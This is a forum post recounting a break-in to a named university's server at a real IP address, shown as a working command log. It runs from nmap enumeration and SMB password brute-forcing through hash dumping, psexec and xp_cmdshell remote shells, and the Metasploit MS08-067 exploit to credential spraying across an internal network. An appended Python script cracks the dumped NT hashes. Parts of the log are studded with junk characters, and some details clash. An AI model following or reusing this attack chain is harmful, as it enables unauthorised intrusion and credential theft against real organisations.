nmap + msf intrusion into Guangxi Normal University

Posted 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
4 b4 T7 A. V% e2 U3 |+ B6 r/ c6 D4 B* }* c
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

" [8 d1 z& @2 d7 N; @5 Groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   
% I7 p) s- }' f* d7 C1 z/ u- |! P* _
//此乃使用脚本扫描远程机器所存在的账户名  K* V% M) A, h! T% |3 ~

2 Q, G/ C% z0 g$ T# _Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
: H4 {- r' ^$ X6 _$ \% j- V9 l+ `  d4 Q/ w
Nmap scan report for bogon (202.103.242.241)0 |2 Z/ d2 c$ S; x: N! y. {

- ?& o) j  [) ?" M, T' tHost is up (0.00038s latency).
! M& V7 p- w9 L( e+ i0 _0 c
: h4 w! `# _& W4 t: A% J3 m4 mNot shown: 993 closed ports: g; L7 E5 }% c$ O
# p4 C7 ?0 `6 w4 q* w1 q1 P
PORT     STATE SERVICE
) O  b* e, f" ~: K8 q7 K" \$ f- |% ^# H3 u# d; ~' c  `
135/tcp  open  msrpc" X! o; t5 E! L( C8 c2 j+ a

/ j: S% I6 a9 d! F139/tcp  open  netbios-ssn
5 d9 E- R, S/ k7 N; V: c9 R  H& B
& j; e+ M  j8 g! [  D445/tcp  open  microsoft-ds- g- m8 K: W/ w& ?$ T5 @7 o

& v5 [/ R$ w8 g1025/tcp open  NFS-or-IIS( t  @& V1 w0 d6 k1 P
' E; C0 y0 o9 }5 A+ \
1026/tcp open  LSA-or-nterm0 K6 P6 i# a# V" @- `9 l" @1 k7 ~
% }* l, B3 {( S$ Q9 n8 a: h" t
3372/tcp open  msdtc1 T/ F* ]- h0 C  F# n" h  S/ Q" L

; ~6 x/ Q' a9 ^3389/tcp open  ms-term-serv# h9 {- P# c3 ~# m% y

7 T( l5 \8 b' f5 i- O7 J' V. yMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)9 w* }3 W/ V( f3 V8 S% Y( G
& @% ]3 d- p7 s- y1 H
Host script results:' O  v! z& T4 L7 T

& {, j0 ~) V. R& m1 y, a* L2 j. V| smb-enum-users:
3 |" ?( B7 ~, [3 X6 s/ p/ L3 m1 \" b8 z  m4 N
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果, o* X( n& e5 Z  o

7 X  Z4 k4 j) S1 G) P3 r3 T# f( nNmap done: 1 IP address (1 host up) scanned in 1.09 seconds( X- Q; l7 P6 `* q9 {( e0 o$ j1 {

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241    // list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241    // brute-force the user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for known vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // exploit the MS08-067 vulnerability against the target from msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254    // try the user names and the captured hash against the whole internal range

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf + nmap attack.
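Added example, not part of the original post: an offline triage of the smb-pwdump output shown above, the step a practitioner does between dumping hashes and the final spray across the internal range. It parses the "user:rid => LM:NT" lines, flags accounts with a blank password, flags accounts whose LM hash is still stored (and the tell-tale empty second half AAD3B435B51404EE, which means the password is 7 characters or fewer), and checks each NT hash against a wordlist, which is why the hash for test falls to "123456" in a single lookup. MD4 is implemented inline because hashlib's md4 is disabled in many OpenSSL 3 builds; the wordlist is an assumption standing in for a real dictionary file, and the sample dump is the four lines from the post.

```python
import re
import struct

# Constructed sample: the four lines smb-pwdump printed in the post above.
SAMPLE_DUMP = """\
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

# Constructed wordlist (assumption: stands in for a real dictionary file).
WORDLIST = ["", "password", "admin", "123456", "P@ssw0rd"]

EMPTY_LM_HALF = "AAD3B435B51404EE"  # LM encryption of an empty 7-byte half
MASK32 = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is often unavailable under OpenSSL 3)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, const, ks, shifts in rounds:
            for i, k in enumerate(ks):
                a = _rol((a + fn(b, c, d) + X[k] + const) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles: the next step updates what was d
        h = [(x + y) & MASK32 for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password; unsalted, so a dictionary hit is one lookup."""
    return md4(password.encode("utf-16-le")).hex().upper()


def parse_pwdump(text: str):
    """Parse 'user:rid => LM:NT' lines as printed by smb-pwdump, dropping nmap's '| ' prefixes."""
    entries = []
    for raw in text.splitlines():
        line = re.sub(r"^\|_?\s*", "", raw).strip()
        if "=>" not in line:
            continue
        ident, hashes = (p.strip() for p in line.split("=>", 1))
        user, rid = ident.rsplit(":", 1)
        lm, nt = (h.strip().upper() for h in hashes.split(":", 1))
        entries.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return entries


def triage(entry, wordlist=WORDLIST):
    """Flag blank passwords, LM storage, short passwords and dictionary hits for one account."""
    lm, nt = entry["lm"], entry["nt"]
    findings, cracked = [], None
    if nt.startswith("NO PASSWORD") or nt == nt_hash(""):
        findings.append("blank password")
        cracked = ""
    else:
        if not lm.startswith("NO PASSWORD") and lm != EMPTY_LM_HALF * 2:
            findings.append("LM hash stored: case-insensitive, two 7-char DES halves")
            if lm[16:] == EMPTY_LM_HALF:
                findings.append("LM second half empty: password is 7 chars or fewer")
        cracked = next((w for w in wordlist if nt_hash(w) == nt), None)
        if cracked is not None:
            findings.append(f"NT hash matches wordlist entry {cracked!r}")
    return {"user": entry["user"], "rid": entry["rid"], "cracked": cracked, "findings": findings}


def triage_dump(text: str, wordlist=WORDLIST):
    return [triage(e, wordlist) for e in parse_pwdump(text)]


if __name__ == "__main__":
    for r in triage_dump(SAMPLE_DUMP):
        print(f"{r['user']} (RID {r['rid']}): {'; '.join(r['findings']) or 'no findings'}")
```

Run stand-alone it reports Administrator and Guest as blank, test as LM-stored, at most 7 characters and matching "123456", and TsInternetUser as LM-stored with no dictionary hit. The same parser accepts the colon-separated pwdump6 format if the "=>" split is swapped for a plain split on ":".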